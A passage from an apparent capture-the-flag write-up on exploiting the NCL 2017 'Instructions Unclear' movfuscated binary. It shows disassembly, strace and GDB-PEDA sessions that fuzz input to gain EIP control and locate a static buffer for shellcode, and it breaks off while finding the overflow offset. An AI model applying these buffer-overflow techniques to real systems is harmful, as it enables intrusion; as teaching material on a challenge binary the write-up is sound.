| 0x08055f3f 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055f46 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055f4c 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x08055f52 8910 mov dword [eax], edx
| 0x08055f54 a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055f59 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055f5f a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055f64 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055f6b 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055f71 8910 mov dword [eax], edx
| 0x08055f73 a1c8b40508 mov eax, dword [loc.R2] ; [0x805b4c8:4]=0 LEA loc.R2 ; loc.R2
| 0x08055f78 a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055f7d b8a0454008 mov eax, loc.sp ; loc.sp
| 0x08055f82 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055f88 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055f8d 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055f94 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055f9a 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x08055fa0 8910 mov dword [eax], edx
| 0x08055fa2 a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055fa7 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055fad a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055fb2 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055fb9 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055fbf 8910 mov dword [eax], edx
| 0x08055fc1 a1ccb40508 mov eax, dword [loc.R3] ; [0x805b4cc:4]=0 LEA loc.R3 ; loc.R3
| 0x08055fc6 a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08055fcb b8a0454008 mov eax, loc.sp ; loc.sp
| 0x08055fd0 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055fd6 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08055fdb 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08055fe2 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055fe8 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x08055fee 8910 mov dword [eax], edx
| 0x08055ff0 a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08055ff5 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08055ffb a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08056000 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08056007 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x0805600d 8910 mov dword [eax], edx
| 0x0805600f a1d4b40508 mov eax, dword [loc.F1] ; [0x805b4d4:4]=0 LEA loc.F1 ; loc.F1
| 0x08056014 a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08056019 b8a0454008 mov eax, loc.sp ; loc.sp
| 0x0805601e 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08056024 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08056029 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08056030 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08056036 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x0805603c 8910 mov dword [eax], edx
| 0x0805603e a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x08056043 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x08056049 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x0805604e 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08056055 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x0805605b 8910 mov dword [eax], edx
| 0x0805605d a1e8b40508 mov eax, dword [loc.D1] ; [0x805b4e8:4]=0 LEA loc.D1 ; loc.D1
| 0x08056062 a380452008 mov dword [loc.stack_temp], eax ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x08056067 a1ecb40508 mov eax, dword [0x805b4ec] ; [0x805b4ec:4]=0
| 0x0805606c a384452008 mov dword [0x8204584], eax ; [0x8204584:4]=0
| 0x08056071 b8a0454008 mov eax, loc.sp ; loc.sp
| 0x08056076 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x0805607c a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x08056081 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x08056088 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x0805608e 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x08056094 8b9298ffdfff mov edx, dword [edx - 0x200068]
| 0x0805609a 8910 mov dword [eax], edx
| 0x0805609c a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x080560a1 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x080560a7 a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x080560ac 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x080560b3 8b1580452008 mov edx, dword [loc.stack_temp] ; [0x8204580:4]=0 LEA loc.stack_temp ; loc.stack_temp
| 0x080560b9 8910 mov dword [eax], edx
| 0x080560bb 8b1584452008 mov edx, dword [0x8204584] ; [0x8204584:4]=0
| 0x080560c1 895004 mov dword [eax + 4], edx
| 0x080560c4 b8a4454008 mov eax, loc.fp ; loc.fp
| 0x080560c9 8b15c8454008 mov edx, dword [loc.on] ; [0x84045c8:4]=0 LEA loc.on ; loc.on
| 0x080560cf a3e4454008 mov dword [loc.data_p], eax ; [0x84045e4:4]=0 LEA loc.data_p ; loc.data_p
| 0x080560d4 8b0495e04540. mov eax, dword [edx*4 + str.pG__b] ; [0x84045e0:4]=0x8604770 loc.discard LEA str.pG__b ; "pG`." @ 0x84045e0
| 0x080560db 8b15a0454008 mov edx, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x080560e1 8910 mov dword [eax], edx
| 0x080560e3 a1a0454008 mov eax, dword [loc.sp] ; [0x84045a0:4]=0x86045f0 loc.id LEA loc.sp ; loc.sp
| 0x080560e8 bafcfbffff mov edx, 0xfffffbfc ; -1028
| 0x080560ed a360442008 mov dword [loc.alu_x], eax ; [0x8204460:4]=0 LEA loc.alu_x ; loc.alu_x
| 0x080560f2 891564442008 mov dword [loc.alu_y], edx ; [0x8204464:4]=0 LEA loc.alu_y ; loc.alu_y
\ 0x080560f8 b800000000 mov eax, 0
view raw r2 pdf@main hosted with ❤ by GitHub
We don't get much useful information from this as the program is obfuscated with that movfuscator program. Movfuscator replaces all instructions with MOV, you can read more about it here. To get some more meaningful information we need to move on to more dynamic analysis.

Dynamic Analysis


I want to verify that the memory locations are the same as what I observed in the static analysis. Lets force the program to run in the background with ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 & and then read the memory mapping of the programs PID with cat /proc/*PID*/maps.

Memory Mapping

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 &
[2] 2821
root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# I guess, uh... type in a passcode: cat /proc/2821/maps
08048000-0805a000 r-xp 00000000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805a000-0805b000 r-xp 00011000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
0805b000-08605000 rwxp 00012000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
08605000-08805000 rwxp 00000000 00:00 0
09288000-092a9000 rwxp 00000000 00:00 0 [heap]
f751a000-f751c000 rwxp 00000000 00:00 0
f751c000-f756f000 r-xp 00000000 08:05 6554104 /lib/i386-linux-gnu/libm-2.24.so
f756f000-f7570000 r-xp 00052000 08:05 6554104 /lib/i386-linux-gnu/libm-2.24.so
f7570000-f7571000 rwxp 00053000 08:05 6554104 /lib/i386-linux-gnu/libm-2.24.so
f7571000-f7722000 r-xp 00000000 08:05 6554100 /lib/i386-linux-gnu/libc-2.24.so
f7722000-f7723000 ---p 001b1000 08:05 6554100 /lib/i386-linux-gnu/libc-2.24.so
f7723000-f7725000 r-xp 001b1000 08:05 6554100 /lib/i386-linux-gnu/libc-2.24.so
f7725000-f7726000 rwxp 001b3000 08:05 6554100 /lib/i386-linux-gnu/libc-2.24.so
f7726000-f7729000 rwxp 00000000 00:00 0
f7755000-f7758000 rwxp 00000000 00:00 0
f7758000-f775a000 r--p 00000000 00:00 0 [vvar]
f775a000-f775c000 r-xp 00000000 00:00 0 [vdso]
f775c000-f777e000 r-xp 00000000 08:05 6554095 /lib/i386-linux-gnu/ld-2.24.so
f777f000-f7780000 r-xp 00022000 08:05 6554095 /lib/i386-linux-gnu/ld-2.24.so
f7780000-f7781000 rwxp 00023000 08:05 6554095 /lib/i386-linux-gnu/ld-2.24.so
ffef1000-fff12000 rwxp 00000000 00:00 0 [stack]
[2]+ Stopped ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8
view raw memmap hosted with ❤ by GitHub
We can see that we have 4 memory regions for this program.
  1. 08048000-0805a000 r-xp 00000000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
  2. 0805a000-0805b000 r-xp 00011000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
  3. 0805b000-08605000 rwxp 00012000 08:05 2752742 /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32
  4. 08605000-08805000 rwxp 00000000 00:00 0
(1) is .text and it's associated executable parts.
(2) is the .dynamic/.got.plt sections which is the ld-linux.so.2 interpreter.
(3) is .data.
(4) is .bss.

We're finally prepared to actually see what this program is doing, the easiest way to do this is strace which traces the system calls and signals when a program's running.

Strace

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# strace ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e
execve("./NCL-2017-Spring-InstructionsUnclear-X32", ["./NCL-2017-Spring-InstructionsUn"..., "209f50f37f89cf43e85e46e57d8624e"], [/* 46 vars */]) = 0
strace: [ Process PID=3083 runs in 32 bit mode. ]
brk(NULL) = 0x9450000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x55665000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=178818, ...}) = 0
mmap2(NULL, 178818, PROT_READ, MAP_PRIVATE, 3, 0) = 0x55668000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1791908, ...}) = 0
mmap2(NULL, 1800732, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x55694000
mprotect(0x55845000, 4096, PROT_NONE) = 0
mmap2(0x55846000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b1000) = 0x55846000
mmap2(0x55849000, 10780, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x55849000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340F\0\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=341556, ...}) = 0
mmap2(NULL, 344144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x5584c000
mmap2(0x5589f000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x52000) = 0x5589f000
close(3) = 0
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x558a1000
set_thread_area({entry_number:-1, base_addr:0x558a1700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0x55846000, 8192, PROT_READ) = 0
mprotect(0x5589f000, 4096, PROT_READ) = 0
mprotect(0x805a000, 4096, PROT_READ) = 0
mprotect(0x5565f000, 4096, PROT_READ) = 0
munmap(0x55668000, 178818) = 0
rt_sigaction(SIGSEGV, {sa_handler=0x80483d0, sa_mask=[], sa_flags=SA_NODEFER}, NULL, 8) = 0
rt_sigaction(SIGILL, {sa_handler=0x8048457, sa_mask=[], sa_flags=SA_NODEFER}, NULL, 8) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL) = 0x9450000
brk(0x9471000) = 0x9471000
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
write(1, "I guess, uh... type in a passcod"..., 35I guess, uh... type in a passcode: ) = 35
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
fstat64(0, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
read(0, TESTPASSWORD
"TESTPASSWORD\n", 1024) = 13
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x80592b9} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x80592b9} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
...
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x80592b9} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
write(1, "this doesn't seem right... try a"..., 37this doesn't seem right... try again
) = 37
--- SIGILL {si_signo=SIGILL, si_code=ILL_ILLOPN, si_addr=0x80592b9} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
exit_group(2) = ?
+++ exited with 2 +++
view raw strace NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e hosted with ❤ by GitHub
Well as expected it prints "I guess, uh... type in a passcode: " and then asks for user input. The program then gets stuck in some form of countdown loop, sending SIGILL (illegal instruction) signals at 0x80592b9 followed by SIGSEGV (segmentation fault) signals. It repeats this loop for the length of the TID. 20 length is 20 loops. The output here is cut-down for readability.

Fuzzing and Exploitation


We can get right to testing this program by sending 2000 A's to STDIN and monitoring what happens with strace.

Testing Input

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# python -c "print 'A'*2000" | strace ./NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8
execve("./NCL-2017-Spring-InstructionsUnclear-X32", ["./NCL-2017-Spring-InstructionsUn"..., "209f50f37f89cf43e85e46e57d8624e8"], [/* 46 vars */]) = 0
strace: [ Process PID=3431 runs in 32 bit mode. ]
brk(NULL) = 0x91b0000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
mmap2(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf770a000
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=178818, ...}) = 0
mmap2(NULL, 178818, PROT_READ, MAP_PRIVATE, 3, 0) = 0xf76de000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\203\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1791908, ...}) = 0
mmap2(NULL, 1800732, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf7526000
mprotect(0xf76d7000, 4096, PROT_NONE) = 0
mmap2(0xf76d8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1b1000) = 0xf76d8000
mmap2(0xf76db000, 10780, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xf76db000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
open("/lib/i386-linux-gnu/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340F\0\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=341556, ...}) = 0
mmap2(NULL, 344144, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xf74d1000
mmap2(0xf7524000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x52000) = 0xf7524000
close(3) = 0
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xf74cf000
set_thread_area({entry_number:-1, base_addr:0xf74cf700, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0 (entry_number:12)
mprotect(0xf76d8000, 8192, PROT_READ) = 0
mprotect(0xf7524000, 4096, PROT_READ) = 0
mprotect(0x805a000, 4096, PROT_READ) = 0
mprotect(0xf7734000, 4096, PROT_READ) = 0
munmap(0xf76de000, 178818) = 0
rt_sigaction(SIGSEGV, {sa_handler=0x80483d0, sa_mask=[], sa_flags=SA_NODEFER}, NULL, 8) = 0
rt_sigaction(SIGILL, {sa_handler=0x8048457, sa_mask=[], sa_flags=SA_NODEFER}, NULL, 8) = 0
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
brk(NULL) = 0x91b0000
brk(0x91d1000) = 0x91d1000
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
write(1, "I guess, uh... type in a passcod"..., 35I guess, uh... type in a passcode: ) = 35
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=NULL} ---
fstat64(0, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0
read(0, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 4096) = 2001
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414145} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
....
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x41414141} ---
--- SIGSEGV {s^C
--- SIGINT {si_signo=SIGINT, si_code=SI_KERNEL} ---
strace: Process 3431 detached
view raw python -c "print 'A'*2000" hosted with ❤ by GitHub
...and it's stuck looping forever with a Segmentation Fault at 0x41414141 which is 4 A's. Lets verify this more in GDB.

Before jumping into GDB I wholeheartedly recommend you install PEDA (Python Exploit Development Assistance) for GDB as it makes your life in GDB tenfold easier.

Alright so lets push 2000 A's into a file called inp and then have gdb input that file's contents whenever it hits a STDIN point. We will also be setting SIGSEGV signals to be passed to gdb so it can continue whenever it hits an error with handle SIGSEGV pass.

Verifying in GDB

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# python -c "print 'A'*2000" > inp
root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# gdb -q ./NCL-2017-Spring-InstructionsUnclear-X32
Reading symbols from ./NCL-2017-Spring-InstructionsUnclear-X32...(no debugging symbols found)...done.
gdb-peda$ handle SIGSEGV pass
Signal Stop Print Pass to program Description
SIGSEGV Yes Yes Yes Segmentation fault
gdb-peda$ r 209f50f37f89cf43e85e46e57d8624e8 < inp
Starting program: /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 < inp
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0xf7ffd000 --> 0x23f3c
ECX: 0x0
EDX: 0x0
ESI: 0xffffd2a0 --> 0xffffd4a7 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
EDI: 0x80483dc (<_start>: mov DWORD PTR ds:0x84045b0,esp)
EBP: 0x0
ESP: 0x86041c0 --> 0x86041c8 ('A' <repeats 200 times>...)
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0x86041c0 --> 0x86041c8 ('A' <repeats 200 times>...)
0004| 0x86041c4 --> 0x0
0008| 0x86041c8 ('A' <repeats 200 times>...)
0012| 0x86041cc ('A' <repeats 200 times>...)
0016| 0x86041d0 ('A' <repeats 200 times>...)
0020| 0x86041d4 ('A' <repeats 200 times>...)
0024| 0x86041d8 ('A' <repeats 200 times>...)
0028| 0x86041dc ('A' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
gdb-peda$ find AAAAAAAAAAAAAAAAAA
Searching for 'AAAAAAAAAAAAAAAAAA' in: None ranges
Found 222 results, display max 222 items:
NCL-2017-Spring-InstructionsUnclear-X32 : 0x86041c8 ('A' <repeats 200 times>...)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x86041da ('A' <repeats 200 times>...)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x86041ec ('A' <repeats 200 times>...)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x86041fe ('A' <repeats 200 times>...)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604210 ('A' <repeats 200 times>...)
NCL-2017-Spring-InstructionsUnclear-X32 : 0x8604222 ('A' <repeats 200 times>...)
...
view raw First gdb round hosted with ❤ by GitHub
On the SIGSEGV we can see that our stack is loaded with our input of A's at 0x086041c8. We can also verify this searching for a string of A's in memory with find AAAAAAAAAAAAAAA which results in the memory address of 0x86041c8. So our input is being stored in the .data segment of memory which is going to be static making jumping to our shellcode super simple.

Before we create our return address we first need to find the offset needed for the overflow. The easiest way to do this is with PEDA's pattern_create feature. Let's create a pattern of 2000 bytes and store it into our inp file with pattern_create 2000 inp.

Finding offset with PEDA

root@ggrins:~/Documents/NCL/Instructions Unclear Writeup# gdb -q ./NCL-2017-Spring-InstructionsUnclear-X32
gdb-peda$ pattern_create 2000 inp
Writing pattern of 2000 chars to filename "inp"
gdb-peda$ r 209f50f37f89cf43e85e46e57d8624e8 < inp
Starting program: /root/Documents/NCL/Instructions Unclear Writeup/NCL-2017-Spring-InstructionsUnclear-X32 209f50f37f89cf43e85e46e57d8624e8 < inp
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb ('\x0b')
EBX: 0xf7ffd000 --> 0x23f3c
ECX: 0x0
EDX: 0x0
ESI: 0xffffd2a0 --> 0xffffd4a7 ("LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc"...)
EDI: 0x80483dc (<_start>: mov DWORD PTR ds:0x84045b0,esp)
EBP: 0x0
